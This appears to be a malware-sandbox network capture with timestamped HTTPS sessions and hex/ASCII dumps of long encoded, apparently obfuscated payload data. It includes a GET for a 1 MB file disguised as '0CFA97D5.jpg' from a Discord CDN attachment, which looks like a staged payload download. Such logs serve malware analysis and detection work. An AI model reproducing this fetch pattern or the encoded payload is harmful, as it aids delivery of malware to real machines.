                                                                                                2021-10-26 15:35:14 UTC6554INData Raw: 6e 67 20 53 20 70 50 20 53 20 70 70 20 53 20 54 53 4f 20 53 20 70 50 20 53 20 6e 54 20 53 20 50 70 20 53 20 70 50 20 53 20 4f 55 20 53 20 70 50 20 53 20 70 70 20 53 20 54 54 50 20 53 20 70 50 20 53 20 6e 54 20 53 20 50 70 20 53 20 70 50 20 53 20 54 53 53 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 54 54 4d 20 53 20 70 50 20 53 20 6e 54 20 53 20 50 4d 20 53 20 70 50 20 53 20 4f 53 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 50 20 53 20 6e 54 20 53 20 55 50 20 53 20 70 50 20 53 20 4f 55 20 53 20 54 53 67 20 53 20 70 70 20 53 20 50 53 20 53 20 70 50 20 53 20 6e 54 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 4f 4f 20 53 20 54 53 67 20 53 20 70 70 20 53 20 54 54 55 20 53 20 70 50 20 53 20 6e 54 20 53 20 50 4d 20 53 20 70 50 20 53 20 4f 55 20 53
                                                                                                Data Ascii: ng S pP S pp S TSO S pP S nT S Pp S pP S OU S pP S pp S TTP S pP S nT S Pp S pP S TSS S TTO S pp S TTM S pP S nT S PM S pP S OS S TTO S pP S TSg S pP S nT S UP S pP S OU S TSg S pp S PS S pP S nT S TSn S pP S OO S TSg S pp S TTU S pP S nT S PM S pP S OU S
                                                                                                2021-10-26 15:35:14 UTC6570INData Raw: 53 69 20 53 20 4f 4f 20 53 20 50 53 20 53 20 69 4f 20 53 20 50 53 20 53 20 6e 6e 20 53 20 54 4d 4d 20 53 20 54 54 4d 20 53 20 54 53 69 20 53 20 4f 4f 20 53 20 6e 4d 20 53 20 70 70 20 53 20 54 54 50 20 53 20 4f 6e 20 53 20 55 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 53 20 53 20 6e 54 20 53 20 54 53 55 20 53 20 54 54 55 20 53 20 4f 55 20 53 20 54 53 70 20 53 20 50 4d 20 53 20 6e 55 20 53 20 70 6e 20 53 20 54 53 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 6e 67 20 53 20 70 6e 20 53 20 70 50 20 53 20 50 70 20 53 20 55 4f 20 53 20 55 55 20 53 20 6e 55 20 53 20 54 54 70 20 53 20 54 53 53 20 53 20 54 53 70 20 53 20 6e 6e 20 53 20 50 69 20 53 20 54 53 53 20 53 20 50 53 20 53 20 54 53 55 20 53 20 54 54 6e 20 53 20 4f 53 20 53 20 6e 54 20 53 20 50 6e 20
                                                                                                Data Ascii: Si S OO S PS S iO S PS S nn S TMM S TTM S TSi S OO S nM S pp S TTP S On S Un S nU S TSi S TSS S nT S TSU S TTU S OU S TSp S PM S nU S pn S TSP S pP S TSg S ng S pn S pP S Pp S UO S UU S nU S TTp S TSS S TSp S nn S Pi S TSS S PS S TSU S TTn S OS S nT S Pn
                                                                                                2021-10-26 15:35:14 UTC6586INData Raw: 55 20 53 20 50 50 20 53 20 4f 6e 20 53 20 69 4f 20 53 20 54 53 55 20 53 20 50 50 20 53 20 70 70 20 53 20 54 4d 53 20 53 20 54 54 55 20 53 20 55 53 20 53 20 54 54 6e 20 53 20 55 6e 20 53 20 70 6e 20 53 20 50 53 20 53 20 50 54 20 53 20 4f 6e 20 53 20 50 50 20 53 20 6e 70 20 53 20 55 70 20 53 20 55 4d 20 53 20 6e 6e 20 53 20 55 6e 20 53 20 55 70 20 53 20 54 54 54 20 53 20 69 4f 20 53 20 54 54 55 20 53 20 50 53 20 53 20 54 54 4f 20 53 20 4f 4f 20 53 20 55 70 20 53 20 50 69 20 53 20 50 53 20 53 20 54 54 53 20 53 20 54 54 55 20 53 20 6e 6e 20 53 20 6e 67 20 53 20 54 4d 54 20 53 20 54 53 69 20 53 20 55 67 20 53 20 54 4d 4d 20 53 20 54 54 55 20 53 20 54 53 69 20 53 20 54 54 4d 20 53 20 6e 55 20 53 20 50 4d 20 53 20 54 53 67 20 53 20 54 54 50 20 53 20 50 54 20 53
                                                                                                Data Ascii: U S PP S On S iO S TSU S PP S pp S TMS S TTU S US S TTn S Un S pn S PS S PT S On S PP S np S Up S UM S nn S Un S Up S TTT S iO S TTU S PS S TTO S OO S Up S Pi S PS S TTS S TTU S nn S ng S TMT S TSi S Ug S TMM S TTU S TSi S TTM S nU S PM S TSg S TTP S PT S
                                                                                                2021-10-26 15:35:14 UTC6602INData Raw: 70 4f 20 53 20 70 70 20 53 20 6e 6e 20 53 20 70 55 20 53 20 70 4f 20 53 20 54 54 4f 20 53 20 70 55 20 53 20 55 54 20 53 20 55 4f 20 53 20 6e 69 20 53 20 55 4f 20 53 20 6e 67 20 53 20 4f 53 20 53 20 6e 67 20 53 20 70 50 20 53 20 55 6e 20 53 20 55 50 20 53 20 70 55 20 53 20 70 70 20 53 20 70 50 20 53 20 6e 67 20 53 20 70 70 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 4f 20 53 20 6e 67 20 53 20 6e 4f 20 53 20 70 4f 20 53 20 54 53 69 20 53 20 54 53 67 20 53 20 6e 53 20 53 20 54 54 4f 20 53 20 54 54 70 20 53 20 54 54 55 20 53 20 50 70 20 53 20 4f 4f 20 53 20 54 54 6e 20 53 20 6e 6e 20 53 20 54 53 70 20 53 20 54 53 4f 20 53 20 54 53 54 20 53 20 54 54 67 20 53 20 50 54 20 53 20 69 6e 20 53 20 70 4f 20 53 20 55 4f 20 53 20 4f 53 20 53 20 55 70 20 53
                                                                                                Data Ascii: pO S pp S nn S pU S pO S TTO S pU S UT S UO S ni S UO S ng S OS S ng S pP S Un S UP S pU S pp S pP S ng S pp S pp S UT S pP S pO S ng S nO S pO S TSi S TSg S nS S TTO S TTp S TTU S Pp S OO S TTn S nn S TSp S TSO S TST S TTg S PT S in S pO S UO S OS S Up S
                                                                                                2021-10-26 15:35:14 UTC6618INData Raw: 4f 20 53 20 4f 55 20 53 20 50 54 20 53 20 6e 69 20 53 20 54 53 6e 20 53 20 6e 6e 20 53 20 55 4d 20 53 20 54 53 67 20 53 20 54 54 4f 20 53 20 6e 53 20 53 20 54 53 67 20 53 20 55 4f 20 53 20 70 55 20 53 20 55 70 20 53 20 55 54 20 53 20 55 54 20 53 20 6e 50 20 53 20 70 4f 20 53 20 54 54 4f 20 53 20 50 6e 20 53 20 55 69 20 53 20 4f 53 20 53 20 55 6e 20 53 20 6e 55 20 53 20 69 55 20 53 20 4f 6e 20 53 20 55 6e 20 53 20 54 53 53 20 53 20 54 54 55 20 53 20 6e 67 20 53 20 70 4f 20 53 20 54 4d 53 20 53 20 54 54 4d 20 53 20 4f 55 20 53 20 55 6e 20 53 20 54 53 55 20 53 20 69 55 20 53 20 4f 53 20 53 20 55 6e 20 53 20 55 54 20 53 20 54 4d 53 20 53 20 6e 69 20 53 20 55 69 20 53 20 70 50 20 53 20 54 53 70 20 53 20 70 70 20 53 20 54 53 67 20 53 20 6e 55 20 53 20 55 70 20
                                                                                                Data Ascii: O S OU S PT S ni S TSn S nn S UM S TSg S TTO S nS S TSg S UO S pU S Up S UT S UT S nP S pO S TTO S Pn S Ui S OS S Un S nU S iU S On S Un S TSS S TTU S ng S pO S TMS S TTM S OU S Un S TSU S iU S OS S Un S UT S TMS S ni S Ui S pP S TSp S pp S TSg S nU S Up
                                                                                                2021-10-26 15:35:14 UTC6634INData Raw: 20 4f 53 20 53 20 6e 4d 20 53 20 54 53 69 20 53 20 4f 6e 20 53 20 50 54 20 53 20 54 54 54 20 53 20 54 4d 53 20 53 20 54 54 55 20 53 20 54 54 53 20 53 20 6e 4f 20 53 20 54 53 54 20 53 20 50 70 20 53 20 55 4f 20 53 20 55 70 20 53 20 69 67 20 53 20 54 53 55 20 53 20 4f 53 20 53 20 50 4d 20 53 20 54 54 69 20 53 20 54 53 50 20 53 20 50 54 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 6e 54 20 53 20 70 50 20 53 20 6e 4f 20 53 20 50 69 20 53 20 50 50 20 53 20 70 70 20 53 20 55 50 20 53 20 54 53 6e 20 53 20 6e 4f 20 53 20 50 69 20 53 20 54 53 67 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 53 69 20 53 20 69 67 20 53 20 54 53 53 20 53 20 54 53 50 20 53 20 70 55 20 53 20 54 53 69 20 53 20 55 70 20 53 20 69 55 20 53 20 54 53 67 20 53 20 54 54 6e 20 53 20 69 4f 20 53 20 54
                                                                                                Data Ascii: OS S nM S TSi S On S PT S TTT S TMS S TTU S TTS S nO S TST S Pp S UO S Up S ig S TSU S OS S PM S TTi S TSP S PT S PM S TSU S nT S pP S nO S Pi S PP S pp S UP S TSn S nO S Pi S TSg S pP S ng S TSi S ig S TSS S TSP S pU S TSi S Up S iU S TSg S TTn S iO S T
                                                                                                2021-10-26 15:35:14 UTC6650INData Raw: 53 20 67 6e 20 53 20 54 67 20 53 20 54 53 20 53 20 67 6e 20 53 20 54 53 6e 20 53 20 54 53 55 20 53 20 54 4d 54 20 53 20 4f 55 20 53 20 67 6e 20 53 20 54 54 50 20 53 20 67 6e 20 53 20 54 53 70 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 54 53 54 20 53 20 54 4d 53 20 53 20 54 54 6e 20 53 20 4f 55 20 53 20 54 4d 4d 20 53 20 54 54 4d 20 53 20 54 53 55 20 53 20 67 6e 20 53 20 4f 4f 20 53 20 67 6e 20 53 20 54 54 69 20 53 20 54 53 50 20 53 20 54 53 70 20 53 20 4f 55 20 53 20 67 6e 20 53 20 67 4d 20 53 20 67 6e 20 53 20 54 4d 4d 20 53 20 54 54 6e 20 53 20 54 53 4d 20 53 20 54 53 67 20 53 20 54 53 69 20 53 20 54 53 54 20 53 20 54 53 4d 20 53 20 54 54 55 20 53 20 4f 6e 20 53 20 54 54 54 20 53 20 54 53 4f 20 53 20 54 53 53 20 53 20 67 6e 20 53 20 54 54 50 20 53 20
                                                                                                Data Ascii: S gn S Tg S TS S gn S TSn S TSU S TMT S OU S gn S TTP S gn S TSp S TMM S TTT S TST S TMS S TTn S OU S TMM S TTM S TSU S gn S OO S gn S TTi S TSP S TSp S OU S gn S gM S gn S TMM S TTn S TSM S TSg S TSi S TST S TSM S TTU S On S TTT S TSO S TSS S gn S TTP S
                                                                                                2021-10-26 15:35:14 UTC6666INData Raw: 20 54 4d 53 20 53 20 4f 55 20 53 20 54 53 4d 20 53 20 67 6e 20 53 20 54 54 50 20 53 20 67 6e 20 53 20 54 54 4d 20 53 20 4f 6e 20 53 20 54 54 55 20 53 20 54 4d 54 20 53 20 54 4d 53 20 53 20 67 6e 20 53 20 54 54 70 20 53 20 67 6e 20 53 20 54 54 55 20 53 20 54 53 70 20 53 20 54 54 69 20 53 20 67 6e 20 53 20 54 67 20 53 20 54 53 20 53 20 67 6e 20 53 20 54 53 54 20 53 20 4f 4f 20 53 20 54 54 6e 20 53 20 4f 4f 20 53 20 54 54 4f 20 53 20 67 6e 20 53 20 54 54 50 20 53 20 67 6e 20 53 20 54 54 70 20 53 20 54 53 70 20 53 20 54 54 4f 20 53 20 4f 4f 20 53 20 54 54 53 20 53 20 67 6e 20 53 20 4f 4f 20 53 20 67 6e 20 53 20 54 4d 53 20 53 20 54 53 70 20 53 20 54 54 67 20 53 20 54 54 55 20 53 20 54 54 69 20 53 20 54 54 6e 20 53 20 54 54 67 20 53 20 54 54 54 20 53 20 54 54
                                                                                                Data Ascii: TMS S OU S TSM S gn S TTP S gn S TTM S On S TTU S TMT S TMS S gn S TTp S gn S TTU S TSp S TTi S gn S Tg S TS S gn S TST S OO S TTn S OO S TTO S gn S TTP S gn S TTp S TSp S TTO S OO S TTS S gn S OO S gn S TMS S TSp S TTg S TTU S TTi S TTn S TTg S TTT S TT
                                                                                                2021-10-26 15:35:14 UTC6682INData Raw: 53 20 54 53 67 20 53 20 54 53 69 20 53 20 54 4d 54 20 53 20 4f 4f 20 53 20 54 53 67 20 53 20 67 6e 20 53 20 67 4d 20 53 20 67 6e 20 53 20 4f 4f 20 53 20 54 53 4d 20 53 20 54 54 69 20 53 20 54 4d 54 20 53 20 54 53 69 20 53 20 4f 4f 20 53 20 54 54 6e 20 53 20 54 53 69 20 53 20 54 53 69 20 53 20 54 53 53 20 53 20 54 54 50 20 53 20 54 54 4d 20 53 20 67 6e 20 53 20 70 50 20 53 20 67 6e 20 53 20 54 53 50 20 53 20 54 54 69 20 53 20 54 54 69 20 53 20 54 53 70 20 53 20 54 53 69 20 53 20 54 4d 53 20 53 20 54 54 69 20 53 20 54 54 70 20 53 20 54 54 54 20 53 20 54 53 6e 20 53 20 67 6e 20 53 20 54 53 53 20 53 20 67 6e 20 53 20 54 53 6e 20 53 20 54 53 4d 20 53 20 54 53 4d 20 53 20 67 6e 20 53 20 54 54 55 20 53 20 67 6e 20 53 20 54 54 4f 20 53 20 54 54 70 20 53 20 54 54
                                                                                                Data Ascii: S TSg S TSi S TMT S OO S TSg S gn S gM S gn S OO S TSM S TTi S TMT S TSi S OO S TTn S TSi S TSi S TSS S TTP S TTM S gn S pP S gn S TSP S TTi S TTi S TSp S TSi S TMS S TTi S TTp S TTT S TSn S gn S TSS S gn S TSn S TSM S TSM S gn S TTU S gn S TTO S TTp S TT
                                                                                                2021-10-26 15:35:14 UTC6698INData Raw: 53 20 4f 6e 20 53 20 54 54 53 20 53 20 54 53 53 20 53 20 54 54 50 20 53 20 55 67 20 53 20 54 53 54 20 53 20 4f 4f 20 53 20 54 54 70 20 53 20 54 53 50 20 53 20 54 54 54 20 53 20 54 54 53 20 53 20 54 67 20 53 20 54 53 20 53 20 54 67 20 53 20 54 53 20 53 20 4f 54 20 53 20 55 4d 20 53 20 54 54 6e 20 53 20 54 54 53 20 53 20 55 53 20 53 20 54 54 69 20 53 20 54 53 54 20 53 20 55 67 20 53 20 54 53 54 20 53 20 54 54 70 20 53 20 54 54 6e 20 53 20 54 54 4d 20 53 20 70 6e 20 53 20 54 54 54 20 53 20 54 53 4f 20 53 20 54 53 4f 20 53 20 4f 6e 20 53 20 54 54 53 20 53 20 54 53 53 20 53 20 54 54 50 20 53 20 55 67 20 53 20 54 53 54 20 53 20 4f 4f 20 53 20 54 54 70 20 53 20 54 53 50 20 53 20 54 54 54 20 53 20 54 54 53 20 53 20 4f 67 20 53 20 54 67 20 53 20 54 53 20 53 20 50
                                                                                                Data Ascii: S On S TTS S TSS S TTP S Ug S TST S OO S TTp S TSP S TTT S TTS S Tg S TS S Tg S TS S OT S UM S TTn S TTS S US S TTi S TST S Ug S TST S TTp S TTn S TTM S pn S TTT S TSO S TSO S On S TTS S TSS S TTP S Ug S TST S OO S TTp S TSP S TTT S TTS S Og S Tg S TS S P
                                                                                                2021-10-26 15:35:14 UTC6714INData Raw: 55 53 20 54 4f 50 20 55 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 4f 50 20 70 6e 20 54 54 54 20 54 54 69 20 70 4f 20 54 4d 53 20 54 53 54 20 6e 6e 20 4f 6e 20 54 53 50 20 54 54 53 20 53 20 54 53 4f 20 54 54 50 20 4f 4f 20 54 54 54 20 54 54 69 20 54 53 54 20 54 53 54 20 69 70 20 54 53 53 20 54 53 55 20 54 53 55 20 53 20 53 20 53 20 53 20 53 20 4d 50 50 20 67 6e 20 53 20 67 4d 20 70 69 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20
                                                                                                Data Ascii: US TOP U S S S S S S S S S S S S S S S OP pn TTT TTi pO TMS TST nn On TSP TTS S TSO TTP OO TTT TTi TST TST ip TSS TSU TSU S S S S S MPP gn S gM pi S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                8192.168.2.549759162.159.129.233443
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2021-10-26 15:35:17 UTC6720OUTGET /attachments/893177342426509335/902539094427578399/0CFA97D5.jpg HTTP/1.1
                                                                                                Host: cdn.discordapp.com
                                                                                                Connection: Keep-Alive
                                                                                                2021-10-26 15:35:17 UTC6720INHTTP/1.1 200 OK
                                                                                                Date: Tue, 26 Oct 2021 15:35:17 GMT
                                                                                                Content-Type: image/jpeg
                                                                                                Content-Length: 1023400
                                                                                                Connection: close
                                                                                                CF-Ray: 6a44c0f10c491f51-FRA
                                                                                                Accept-Ranges: bytes
                                                                                                Age: 2128
                                                                                                Cache-Control: public, max-age=31536000
                                                                                                ETag: "d3cdbf4cf600f86ad718adfd07a223c2"
                                                                                                Expires: Wed, 26 Oct 2022 15:35:17 GMT
                                                                                                Last-Modified: Tue, 26 Oct 2021 12:48:08 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                CF-Cache-Status: HIT
                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                Cf-Bgj: h2pri
                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                x-goog-generation: 1635252488534942
                                                                                                x-goog-hash: crc32c=wjkzZg==
                                                                                                x-goog-hash: md5=082/TPYA+GrXGK39B6Ijwg==
                                                                                                x-goog-metageneration: 1
                                                                                                x-goog-storage-class: STANDARD
                                                                                                x-goog-stored-content-encoding: identity
                                                                                                x-goog-stored-content-length: 1023400
                                                                                                X-GUploader-UploadID: ADPycdt5fSirEYMb_NkxzZKC7t6tFfhYM04DPAmKMeDPJgfPgiJTBhU38u8ZzkjplNBvCv9YQAkb-5YryF3oMIp-UKg
                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v%2FP2JIGthGZKlmFo%2FRCDK0GLLwX6UK2ZKghBVdnwpnRVkOM7PMreYMdqhow4KLvP3RYL8wbwFWTkDU5qRHxGa3K44vFa0UqD4iCAUwrHvmaVeuOfCf7g%2FR9VsQCozf9R61NGlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                2021-10-26 15:35:17 UTC6721INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                2021-10-26 15:35:17 UTC6721INData Raw: 53 54 4d 67 69 50 70 6e 55 4f 2d 6e 6e 20 4f 53 20 54 69 69 20 53 20 67 20 53 20 53 20 53 20 69 20 53 20 53 20 53 20 4d 50 50 20 4d 50 50 20 53 20 53 20 54 55 69 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 70 69 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 54 4d 55 20 53 20 53 20 53 20 54 69 20 67 54 20 54 55 70 20 54 69 20 53 20 54 55 53 20 4f 20 4d 53 50 20 67 67 20 54 55 69 20 54 20 6e 70 20 4d 53 50 20 67 67 20 55 69 20 54 53 69 20 54 53 50 20 54 54 50 20 67 4d 20 54 54 4d 20 54 54 69 20 54 54 54 20 54 53 67 20 54 54 69 20 4f 6e 20 54 53 4f 20 67 4d 20 4f 4f 20 4f 6e 20 54 54 53 20 54
                                                                                                Data Ascii: STMgiPpnUO-nn OS Tii S g S S S i S S S MPP MPP S S TUi S S S S S S S pi S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S TMU S S S Ti gT TUp Ti S TUS O MSP gg TUi T np MSP gg Ui TSi TSP TTP gM TTM TTi TTT TSg TTi On TSO gM OO On TTS T
                                                                                                2021-10-26 15:35:17 UTC6723INData Raw: 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 4d 50 20 69 53 20 4d 4d 4f 20 54 53 4f 20 54 54 50 20 50 53 20 69 55 20 50 53 20 50 53 20 55 69 20 54 54 69 20 54 54 6e 20 54 69 70 20 54 69 67 20 50 53 20 69 55 20 54 67 55 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 54 54 4d 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69
                                                                                                Data Ascii: S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S MP iS MMO TSO TTP PS iU PS PS Ui TTi TTn Tip Tig PS iU TgU Pi Ui TTi TTn TSO TTM PS TTM PS Pi Ui TTi TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU PS Pi Ui
                                                                                                2021-10-26 15:35:17 UTC6724INData Raw: 69 50 20 50 50 20 55 69 20 54 54 69 20 55 50 20 54 53 4f 20 54 54 4d 20 50 53 20 4d 69 55 20 50 54 20 50 69 20 55 69 20 54 54 4d 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 54 55 20 50 69 20 55 69 20 54 55 20 4f 54 20 67 54 20 4d 54 20 4f 69 20 4f 50 20 55 54 20 50 69 20 55 69 20 54 4d 70 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 69 55 20 50 69 20 55 69 20 54 54 4d 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 4d 69 55 20 69 4f 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 50 67 20 54 53 4f 20 54 54 4d 20 54 54 4d 20 67 53 20 70 69 20 70 4f 20 67 55 20 54
                                                                                                Data Ascii: iP PP Ui TTi UP TSO TTM PS MiU PT Pi Ui TTM TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU TU Pi Ui TU OT gT MT Oi OP UT Pi Ui TMp TTn TSO TTM PS iU iU Pi Ui TTM TTn TSO TTM MiU iO PS Pi Ui TTi TTn TSO TTM PS iU PS Pi Ui TTi Pg TSO TTM TTM gS pi pO gU T
                                                                                                2021-10-26 15:35:17 UTC6725INData Raw: 54 54 70 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50 20 54 69 20 50 69 20 55 69 20 54 4d 53 20 4f 50 20 54 53 4f 20 4f 4f 20 4d 20 69 4f 20 50 53 20 70 54 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 53 20 54 54 4d 20 50 53 20 67 67 20 6e 70 20 50 4d 20 55 69 20 54 54 69 20 54 54 67 20 4d 20 6e 6e 20 50 53 20 69 55 20 50 70 20 4d 55 20 55 69 20 4f 6e 20 70 4f 20 54 53 55 20 54 54 4d 20 50 6e 20 69 55 20 50 53 20 50 69 20 55 53 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 69 20 69 4f 20 69 55 20 50 53 20 50 53 20 50 4f 20 6e 70 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 69 20 69 55 20 67 67 20 70 20 55 50 20 54 54 69 20 54 4d 70 20 54 53 4f 20 54 54 4d 20 50 53 20 50 67 20 50 53 20 50 69 20 70 4f 20 54 4d 20 54 54 67 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50 20 54
                                                                                                Data Ascii: TTp TSO TTM Pi OP Ti Pi Ui TMS OP TSO OO M iO PS pT Ui TTi TTn TTS TTM PS gg np PM Ui TTi TTg M nn PS iU Pp MU Ui On pO TSU TTM Pn iU PS Pi US TTi TTn TMi Ti iO iU PS PS PO np TTn TSO TMM Mi iU gg p UP TTi TMp TSO TTM PS Pg PS Pi pO TM TTg TSO TTM Pi OP T
                                                                                                2021-10-26 15:35:17 UTC6727INData Raw: 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 53 4d 20 54 4f 54 20 54 50 50 20 50 53 20 50 69 20 55 50 20 4f 53 20 70 54 20 54 53 4f 20 54 54 4d 20 50 70 20 70 6e 20 54 4d 67 20 50 69 20 55 69 20 54 4d 53 20 54 50 20 67 53 20 50 55 20 50 53 20 69 55 20 50 70 20 67 50 20 54 4d 54 20 54 54 67 20 55 67 20 6e 53 20 54 54 4f 20 54 6e 55 20 50 70 20 50 53 20 50 69 20 55 53 20 55 4f 20 54 54 6e 20 54 4f 20 54 4d 53 20 50 53 20 69 55 20 50 69 20 4d 67 53 20 4f 4d 20 54 54 69 20 54 54 6e 20 54 54 55 20 55 55 20 54 54 70 20 69 55 20 50 53 20 70 53 20 70 69 20 4d 4f 20 70 4d 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 69 20 50 69 20 50 69 20 55 69 20 55 4f 20 54 54 53 20 70 69 20 54 54 55 20 4d 53 20 4d 67 6e 20 6e 55 20 50 69 20 55 69 20 54 54 69 20 54
                                                                                                Data Ascii: gS TnT TTi TTn TSn TSM TOT TPP PS Pi UP OS pT TSO TTM Pp pn TMg Pi Ui TMS TP gS PU PS iU Pp gP TMT TTg Ug nS TTO TnU Pp PS Pi US UO TTn TO TMS PS iU Pi MgS OM TTi TTn TTU UU TTp iU PS pS pi MO pM TSO TTM Pp Mi Pi Pi Ui UO TTS pi TTU MS Mgn nU Pi Ui TTi T
                                                                                                2021-10-26 15:35:17 UTC6728INData Raw: 69 20 6e 50 20 55 55 20 54 53 67 20 69 55 20 50 53 20 70 53 20 54 4d 70 20 55 69 20 4f 69 20 54 50 69 20 54 54 4d 20 69 4f 20 53 20 50 70 20 50 69 20 4f 54 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 4d 20 6e 55 20 54 53 54 20 55 55 20 54 53 70 20 55 70 20 4d 70 20 54 54 67 20 50 53 20 50 69 20 4f 69 20 55 55 20 55 67 20 6e 53 20 54 67 50 20 50 53 20 67 50 20 4d 20 50 53 20 55 69 20 54 54 54 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 6e 20 69 55 20 50 53 20 67 4f 20 55 70 20 54 53 67 20 4f 55 20 70 69 20 4f 55 20 4d 53 20 50 54 20 67 4f 20 69 67 20 54 4d 54 20 54 4d 50 20 55 67 20 70 4f 20 67 69 20 50 53 20 69 55 20 50 70 20 67 53 20 6e 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 53 20 4d 53 20 4d 6e 20 4d 4d 4d 20 54 70
                                                                                                Data Ascii: i nP UU TSg iU PS pS TMp Ui Oi TPi TTM iO S Pp Pi OT TTi TTn TSO TTM PS iU PS PM nU TST UU TSp Up Mp TTg PS Pi Oi UU Ug nS TgP PS gP M PS Ui TTT TTn TSO TTM Pn iU PS gO Up TSg OU pi OU MS PT gO ig TMT TMP Ug pO gi PS iU Pp gS n TTi TTn TSg OS MS Mn MMM Tp
                                                                                                2021-10-26 15:35:17 UTC6729INData Raw: 50 4f 20 67 6e 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 70 20 67 6e 20 50 54 20 50 69 20 55 4d 20 54 54 4d 20 4f 4f 20 4d 69 6e 20 69 20 50 70 20 69 55 20 50 53 20 69 50 20 6e 69 20 4f 50 20 54 4d 6e 20 6e 50 20 54 69 20 50 20 69 55 20 50 53 20 50 53 20 54 4d 53 20 4f 70 20 4f 69 20 54 54 53 20 54 4d 4d 20 4d 50 20 54 4f 70 20 6e 70 20 53 20 55 69 20 54 54 69 20 54 54 67 20 54 53 6e 20 55 55 20 54 53 69 20 69 4f 20 50 53 20 69 55 20 54 4d 54 20 54 54 55 20 4f 55 20 54 53 4d 20 4f 54 20 69 55 20 67 55 20 50 6e 20 69 4f 20 54 4d 69 20 54 53 4f 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 69 20 67 50 20 4d 20 50 67 20 55 69 20 70 54 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 67 69 20 69 55 20 50 53 20 67 4f 20 55 70 20 54 53 53 20 4d 67 4f 20 4d 53 20 70 70 20 50
